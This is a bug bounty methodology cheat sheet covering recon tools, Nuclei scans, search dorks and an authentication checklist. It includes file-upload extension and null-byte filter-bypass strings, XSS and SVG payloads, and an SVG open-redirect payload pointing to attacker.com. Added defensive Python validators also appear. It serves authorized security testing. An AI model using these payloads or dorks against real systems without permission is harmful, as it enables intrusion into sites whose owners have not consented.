Bug Bounty

Custom Header Setup

Steps to Add Custom Header in Burp Requests

  • Select Proxy -> Options

  • Go to Match and Replace and select add

  • Specify the details of the match and replace as shown below

    1. Type: Request Header

    2. Match: Leave blank to add a new header

    3. Replace: hacker@bugbounty.site

    4. Comment: Manually BBP header

Information Gathering

  • LeakIX - often blocked by organizations for gray hat searches

  • Shodan - scans less frequently than LeakIX but whitelisted

  • Censys - best overall scanner but without vulnerability discovery

  • Chaos.ProjectDiscovery - real-time recon/DNS data for public bug bounty programs

  • Search engine dorking

  • ReconFTW - automated recon and vulnerability scanner

  • Uncover - tool used to discover exposed hosts on the internet using multiple search engines

  • PrettyRecon - active reconnaissance tool

  • BountyStrike - collection of bash and python scripts that installs common tools for recon scans and asset discovery

  • Nuclei - template-based security check scanner; get started with Nuclei here

  • Nuclei Templates Directory - visually navigate available nuclei templates

  • Community edition nuclei templates (CENT) - collect and organize other custom templates

Getting started with some CVE scanning using Nuclei templates:

nuclei -target "https://site.com" -t cves
nuclei -target "https://site.com" -t /path/to/nuclei-templates/cves
nuclei -target "https://site.com" -t cves -rl <max-requests-per-second>

Mass security testing on subdomains:

cat subdomains.txt | nuclei -t /path/to/nuclei-templates/
nuclei -t /path/to/nuclei-templates/ -l urls.txt

Rate-limit flags:

-rl, -rate-limit int           maximum number of requests to send per second (default 150)
-rlm, -rate-limit-minute int   maximum number of requests to send per minute

Combining the nuclei scanner with CENT custom templates:

nuclei -u https://example.com -t ./cent-nuclei-templates -tags cve
nuclei -l urls.txt -t ./cent-nuclei-templates -tags cve

Daily updated text file of all domains within scope on active bug bounty programs: https://github.com/arkadiyt/bounty-targets-data/blob/main/data/domains.txt

Google Dorks

  • Dork: intitle:"index of /.git/"
    Purpose: Searching for exposed .git directory listings

  • Dork: allintext:index filetype:git
    Purpose: Searching for .git file extensions

  • Dork: inurl:"index.php?id="
    Purpose: Searching for PHP pages with an id parameter

  • Dork: inurl:"admin/dashboard.php" site:.com
    Purpose: Searching for PHP admin dashboards

  • Dork: intitle:"login" "admin" site:http://site.com
    Purpose: Searching for admin login pages

  • Dork: intitle:"Index of /" .htaccess site:http://site.com
    Purpose: Searching for exposed Apache configuration files

  • Dork: site:website.com inurl:"contact" | inurl:"contact-us" | inurl:"contactus" | inurl:"contact_us" | inurl:"contact_form" | inurl:"contact-form"
    Purpose: Searching for possible contact forms

  • Dork: inurl:http | inurl:url= | inurl:path= | inurl:dest= | inurl:html= | inurl:data= | inurl:domain= | inurl:page= inurl:& site:example[.]com
    Purpose: Searching for SSRF-prone parameters

Shodan Dorks

  • Dork: hostname:".gov" product:"Jenkins" 200
    Purpose: Searching for Jenkins instances on .gov hosts

  • Dork: ssl.cert.subject.CN:"*.google.com"+200
    Purpose: Returns all SSL services presenting a certificate issued for *.google.com with an HTTP response code of 200

  • Dork: ssl.cert.issuer.cn:"DOD SW CA-60" 200
    Purpose: Returns all SSL certificates issued by the DoD with an HTTP response code of 200

Sensitive Information Exposure methods: use GitTools (gitdumper.sh) or gittyleaks.

Defense Evasion

Attempt to bypass application protections such as Cloudflare, Akamai, etc.

Worth a shot: the Cloudflare Origin IP tool by @gwen001.

Check to see if the application is behind a WAF:

wafw00f $URL
whatwaf -u $URL
# nmap takes a hostname or IP address, not a URL
nmap -p $PORT --script=http-waf-fingerprint,http-waf-detect $HOST

Authentication:

Registration

  • Input validation

  • Analysis

  • Misc

  • Password reset process

    • Password reset tokens (expiration/reuse)

  • Failed retry lockout (DoS)

  • Password policies

  • Update profile information without asking for the password

  • Default or easy-to-guess keys

  • User enumeration

  • HTTP Authentication

  • Authentication Bypass

  • Identify weak authentication channels (find the primary mechanism and identify secondary mechanisms / methods [Mobile App, Call Center, SSO])

Authorization:

Session:

General:

File Upload:

  • Extensions Impact

    • ASP, ASPX, PHP5, PHP, PHP3: Webshell, RCE

    • SVG: Stored XSS, SSRF, XXE

    • GIF: Stored XSS, SSRF

    • CSV: CSV injection

    • XML: XXE

    • AVI: LFI, SSRF

    • HTML, JS : HTML injection, XSS, Open redirect

    • PNG, JPEG: Pixel flood attack (DoS)

    • ZIP: RCE via LFI, DoS

    • PDF, PPTX: SSRF, BLIND XXE

  • Blacklisting Bypass

    • PHP → .phtm, .phtml, .phps, .pht, .php2, .php3, .php4, .php5, .shtml, .phar, .pgif, .inc

    • ASP → .asp, .aspx, .cer, .asa

    • Jsp → .jsp, .jspx, .jsw, .jsv, .jspf

    • Coldfusion → .cfm, .cfml, .cfc, .dbm

    • Using random capitalization → .pHp, .pHP5, .PhAr

  • Whitelisting Bypass

    • file.jpg.php

    • file.php.jpg

    • file.php.blah123jpg

    • file.php%00.jpg

    • file.php\x00.jpg - this can also be done while uploading the file: name it file.phpD.jpg and change the D (0x44) to 00 in a hex editor.

    • file.php%00

    • file.php%20

    • file.php%0d%0a.jpg

    • file.php.....

    • file.php/

    • file.php.\

    • file.php#.png

    • file.

    • .html
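As an added defensive example (not part of the original notes): a filename allowlist for a hypothetical upload handler that rejects every whitelisting-bypass string in the list above and only accepts a few image/document extensions; the accepted-extension set and function name are assumptions.

```python
import re
from urllib.parse import unquote

# Extensions this (hypothetical) upload handler accepts; everything else is rejected.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf"}

# Anything that can terminate a string, split a path, or confuse a parser on the way
# from the HTTP layer to the filesystem: NUL, CR/LF and other control characters,
# path separators, fragment/query markers, and a '%' that survived one round of decoding
# (so a double-encoded %2500 is rejected rather than decoded again downstream).
FORBIDDEN = re.compile(r"[\x00-\x1f\x7f/\\#?%]")
BASENAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def safe_upload_name(raw: str):
    """Return a normalised 'name.ext' for an acceptable filename, or None to reject.

    Percent-decode once so file.php%00.jpg is judged the same way as file.php\\x00.jpg,
    then apply an allowlist to the whole name instead of a substring or "ends with" check.
    """
    name = unquote(raw)
    if FORBIDDEN.search(name):
        return None
    # Exactly one dot: rejects file.jpg.php, file.php.jpg, file.php.blah123jpg,
    # file.php....., "file." (empty extension) and ".html" (empty basename).
    parts = name.split(".")
    if len(parts) != 2:
        return None
    base, ext = parts
    if not BASENAME_RE.match(base):
        return None
    ext = ext.lower()  # case-insensitive: .pHp is not a different extension
    if ext not in ALLOWED_EXTENSIONS:  # "php " from file.php%20 also fails here
        return None
    return f"{base}.{ext}"
```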

Vulnerabilities

XSS

GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;

<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/>

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      alert("HolyBugx XSS");
   </script>
</svg>

Open Redirect

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='https://attacker.com'"
xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</svg>
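An added example, not from the original notes, of the server-side check that catches both SVG payloads above (the <script> element in the XSS section and the onload handler in the Open Redirect section) and also rejects the GIF89a polyglot because it is not well-formed XML; the function names are hypothetical.

```python
import xml.etree.ElementTree as ET

# Elements that execute script, embed foreign content, or pull in other documents.
DANGEROUS_TAGS = {"script", "foreignObject", "iframe", "embed", "object", "use", "animate", "set"}


def _local(qname: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on tags and attributes."""
    return qname.rsplit("}", 1)[-1]


def svg_findings(svg_bytes: bytes) -> list[str]:
    """Return the reasons an uploaded SVG should be rejected; an empty list means it passed.

    The standard-library parser does not fetch the external DTD named in a DOCTYPE,
    so the check itself does not become an SSRF/XXE vector.
    """
    findings: list[str] = []
    try:
        root = ET.fromstring(svg_bytes)
    except ET.ParseError as exc:
        # Covers the GIF89a/... polyglot: whatever it is, it is not an SVG document.
        return [f"not well-formed XML: {exc}"]
    if _local(root.tag) != "svg":
        findings.append(f"root element is <{_local(root.tag)}>, not <svg>")
    for el in root.iter():
        tag = _local(el.tag)
        if tag in DANGEROUS_TAGS:
            findings.append(f"<{tag}> element")
        for attr, value in el.attrib.items():
            name = _local(attr).lower()
            if name.startswith("on"):
                # onload="window.location=..." and friends: every event handler is script.
                findings.append(f"event handler {name} on <{tag}>")
            elif name == "href" and not value.strip().startswith("#"):
                # Non-fragment href (xlink:href included): javascript:, data:, remote URL.
                findings.append(f"external href on <{tag}>: {value.strip()[:40]}")
    return findings


def is_safe_svg(svg_bytes: bytes) -> bool:
    """True only when no finding was raised; reject-by-default for anything else."""
    return not svg_findings(svg_bytes)
```

For untrusted input in production, pair this with defusedxml so entity expansion in an internal DTD subset is capped as well.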

Adobe Experience Manager (AEM) Configuration Testing

Shodan Dork:

http.component:"Adobe Experience Manager"

Resources:

  • AEM Hacker tool

  • SlideShare presentation on AEM by 0ang3el

Reporting

CVSS 3.1 Calculator
